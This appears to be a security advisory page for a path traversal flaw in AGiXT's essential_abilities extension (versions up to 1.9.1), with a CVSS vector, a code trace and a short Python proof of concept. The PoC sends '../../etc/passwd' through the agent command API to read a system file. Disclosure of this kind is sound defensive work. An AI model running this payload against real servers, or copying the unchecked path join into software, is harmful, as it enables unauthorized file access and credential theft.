CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
4Description
### Summary The safe_join() function in the essential_abilities extension fails to validate that resolved file paths remain within the designated agent workspace. An authenticated attacker can use directory traversal sequences to read, write, or delete arbitrary files on the server hosting the AGiXT instance. ### Details `agixt/endpoints/Extension.py:165` (source) -> `agixt/XT.py:1035` (hop) -> `agixt/extensions/essential_abilities.py:436` (sink) ```python # source command_args = command.command_args # hop response = await Extensions(...).execute_command(command_name=command_name, command_args=command_args) # sink new_path = os.path.normpath(os.path.join(self.WORKING_DIRECTORY, *paths.split("/"))) ``` ### PoC ```python # tested on: agixt<=1.9.1 # install: pip install agixt==1.9.1 import requests BASE = "http://localhost:7437" TOKEN = "<your_api_key>" headers = {"Authorization": f"Bearer {TOKEN}"} payload = { "command_name": "read_file", "command_args": { "filename": "../../etc/passwd" } } r = requests.post(f"{BASE}/api/agent/MyAgent/command", json=payload, headers=headers) print(r.text) # expected output: root:x:0:0:root:/root:/bin/bash ... ``` ### Impact Authenticated users can read, overwrite, or delete arbitrary files on the host server, enabling credential theft, persistent code execution, or denial of service. Authentication is required but no elevated privileges are needed beyond a valid API key.
Analysis
Path traversal in AGiXT Python package (versions ≤1.9.1) allows authenticated attackers to read, write, or delete arbitrary files on the host server. The essential_abilities extension's safe_join() function fails to validate that resolved paths remain within the agent workspace directory, enabling directory traversal sequences (e.g., ../../etc/passwd) to bypass intended file access restrictions. …
Sign in for full analysis, threat intelligence, and remediation guidance.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-20974
GHSA-5gfj-64gh-mgmw